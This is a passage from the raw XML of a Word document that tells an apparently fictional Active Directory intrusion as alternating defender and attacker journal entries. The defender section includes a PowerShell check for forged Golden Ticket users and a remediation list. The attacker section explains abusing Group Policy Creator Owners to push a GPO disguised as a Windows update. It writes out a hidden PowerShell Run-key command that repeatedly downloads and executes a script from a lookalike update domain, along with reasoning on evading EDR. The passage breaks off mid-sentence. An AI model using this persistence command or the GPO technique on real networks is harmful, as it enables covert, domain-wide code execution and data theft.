    <w:p w14:paraId="50A3082D" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="00CE6E70" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">    $user = $ticket.Properties[0].Value  # TargetUserName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197D8DC0" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="00CE6E70" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">    if ($adUsers -notcontains $user -and $user -notmatch '\$') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B3CBB5" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="00CE6E70" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">        Write-Output "PHANTOM USER DETECTED: $user at $($ticket.TimeCreated)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9A80C6" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="00CE6E70" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C29D2A6" w14:textId="1E4AF13E" w:rsidR="007B3505" w:rsidRPr="00CE6E70" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F97B4CC" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>I ran it. Three phantom users in the past week:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FFCC6D" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>fakeuser</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> (known, November 5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45525507" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>sqlagent</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> (November 6, 1412)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0294C8CF" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>backup_svc</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> (November 6, 2307)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E869D2" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>sqlagent</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> requested a service ticket for </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>MSSQLSvc/SQL-PROD-01.corp.target.local:1433</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>backup_svc</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> requested </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>CIFS/FILESERVER01.corp.target.local</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve">. Both are forged accounts. Both authenticated successfully. Both were accepted by the DC because the tickets were signed with the </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>old</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>krbtgt</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> hash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F304EBF" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>The rotation killed these tickets. But the fact that they existed at all means the attacker had multiple Golden Tickets ready to go. They didn't just forge one — they built an arsenal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B49BB5F" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve">And they used them. </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>sqlagent</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> touched our production SQL server. </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>backup_svc</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> touched our primary file server. I don't know what they did after authentication because service ticket grants don't log file operations — only that the ticket was issued. To know what they accessed, I'd need application-level logging that we don't have.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A5F803" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>This is bad. This is really, really bad.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08287664" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>I need to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13529201" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve">Assume breach on </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>SQL-PROD-01</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>FILESERVER01</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B7E244" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve">Rotate </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>all</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> service account passwords, not just </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>krbtgt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6670237E" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3505">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Disable </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>svc-backup</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> entirely — it's compromised beyond recovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770E7BFA" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3505">
        <w:t>Audit every account with DCSync rights and remove unnecessary permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B7128C" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3505">
        <w:t>Deploy application-level auditing on SQL and file servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674F278D" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007B3505">
        <w:t>Check for additional persistence on every host these phantom users touched</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62AD29E2" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve">But I also need to consider: what if they're still here? What if they have a beacon on </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>WS-HR-012</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> that hasn't checked in yet? What if there are other WMI subscriptions I haven't found?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282CB5E5" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>I'm deploying a full network hunt. Every DC, every server, every workstation gets a memory dump and a forensic timeline. It's going to take days. It's going to cost a fortune. But the alternative — not knowing the full scope — is worse.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564AD028" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>I also need to tell the CISO that we may have lost production data. The merger documents, the board presentations, possibly personnel records. I need to prepare for regulatory notifications, legal holds, and executive panic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2070B1" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>This is the part of the job I hate. Not the technical work — that's a puzzle, and I love puzzles. It's the human part. Telling people that their careful plans, their sensitive information, their trust in the security team, might all be compromised because someone clicked a phishing link and we didn't have proper logging enabled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8FE7D3" w14:textId="55D9350F" w:rsidR="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>But I'm going to find this bastard. Every beacon, every backdoor, every forged ticket. I'm going to burn them out of my network like a disease. And then I'm going to rebuild this infrastructure so that the next attacker — because there will alway</w:t>
      </w:r>
      <w:r>
        <w:t>s be a next attacker – finds a fortress, not a junk drawer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9EB064" w14:textId="29D07F31" w:rsidR="007B3505" w:rsidRPr="00A40F32" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A40F32">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>November 12 – 0347</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA57C57" w14:textId="5AE7649C" w:rsidR="007B3505" w:rsidRPr="00A40F32" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A40F32">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Attacker’s Journal Entry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3357CCB2" w14:textId="57FAD093" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve">They found the WMI subscription on </w:t>
      </w:r>
      <w:r w:rsidRPr="00A40F32">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>FILESERVER01</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve">. I saw the EDR alert </w:t>
      </w:r>
      <w:r w:rsidR="00A40F32" w:rsidRPr="007B3505">
        <w:t>on</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> my secondary monitoring channel — the one I set up specifically to watch for blue team activity. The alert triggered at 1423 on November 7, about five hours after I last checked in.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A549F5B" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve">I didn't panic. I expected this. A competent defender </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>should</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> find WMI persistence eventually. The question was always: what do they find </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>after</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> that?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7245F8" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve">So far, nothing on </w:t>
      </w:r>
      <w:r w:rsidRPr="00A40F32">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>WS-HR-012</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t>. The beacon there is still dormant, still waiting for its 72-hour check-in window. I haven't activated it since November 3. By now, the EDR's historical process data has probably aged out. The initial PowerShell sleep command is long gone from memory. If they memory-dumped the host today, they'd find nothing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F301C0" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:lastRenderedPageBreak/>
        <w:t>But I'm not going to use that beacon again. It's compromised by association — same timeframe as the initial intrusion, same attacker TTPs. If I activate it, I risk correlation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A97079A" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve">Instead, I've been building something new. Something the defender won't find because it doesn't look like malware. It looks like </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>them</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0B8B84" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>Here's what I did:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F4285D" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve">I found a legitimate Group Policy Object called Default Domain Policy that applies to every computer in the domain. It sets password policies, lockout thresholds, audit policies — the basics. I don't have write access to this GPO (I'm not Domain Admin anymore, thanks to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>krbtgt</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> rotation), but I found something interesting:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BD305B" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve">There's a </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>second</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> GPO called Workstation Baseline that applies to all non-server machines. It was created in 2019 and hasn't been modified since. The permissions on it show that Domain Admins have full control, but also — inexplicably — Authenticated Users have "</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Read</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t>" and "</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Apply Group Policy</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t>" rights. That's default behavior for GPOs, but it means any authenticated user can read the GPO contents.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F4F238" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve">More importantly, I found that </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>svc-backup</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> — the compromised service account I still have credentials for — is a member of Group Policy Creator Owners. That group can create new GPOs and link them to OUs. It can't modify existing GPOs without additional permissions, but it </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>can</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> create new ones.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FD1C0C" w14:textId="52BD0CE5" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>So</w:t>
      </w:r>
      <w:r w:rsidR="00A40F32">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> I created a new GPO called Security Update - KB5028185. I named it after a real Windows update to blend in. I linked it to the Workstations OU with the lowest possible link order (highest priority). The GPO does one thing: it sets a registry value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53690FF2" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="00CE6E70" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE6E70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SecurityHealthHost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5768B21C" w14:textId="77777777" w:rsidR="000D0F3B" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve">The value points to: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00958C09" w14:textId="3B9422C4" w:rsidR="007B3505" w:rsidRPr="00CE6E70" w:rsidRDefault="00A40F32" w:rsidP="00A40F32">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>C:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="BC6060"/>
        </w:rPr>
        <w:t>\W</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>indows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="BC6060"/>
        </w:rPr>
        <w:t>\S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>ystem32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="BC6060"/>
        </w:rPr>
        <w:t>\W</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>indowsPowerShell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="BC6060"/>
        </w:rPr>
        <w:t>\v</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>1.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="BC6060"/>
        </w:rPr>
        <w:t>\p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>owershell.exe -windowstyle hidden -c "while(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>$true){try{iex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t>(New-Object Net.WebClient).DownloadString('https://windows-update-catalog[.]cdn[.]com/s/hostcheck.ps1');Start-Sleep -s 86400}catch{Start-Sleep -s 300}}}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0429F5F0" w14:textId="3D068D6C" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:t>This is a registry run key persistence mechanism but deployed via GPO. Every workstation that applies this GPO will run the PowerShell command at startup. The script downloads a secondary payload from my CDN domain, executes it in memory, then sleeps for 24 hours before repeating.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CCA24C" w14:textId="77777777" w:rsidR="007B3505" w:rsidRPr="007B3505" w:rsidRDefault="007B3505" w:rsidP="007B3505">
      <w:r w:rsidRPr="007B3505">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The beauty of this: it's </w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>legitimate Group Policy</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve">. It shows up in </w:t>
      </w:r>
      <w:r w:rsidRPr="00A40F32">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>gpresult</w:t>
      </w:r>
      <w:r w:rsidRPr="007B3505">
        <w:t xml:space="preserve"> as a normal policy setting. It doesn't trigger EDR because it's not process injection — it's a standard registry modification via authorized administrative mechanism. The PowerShell execution is hidden behind </w:t>
      </w:r>
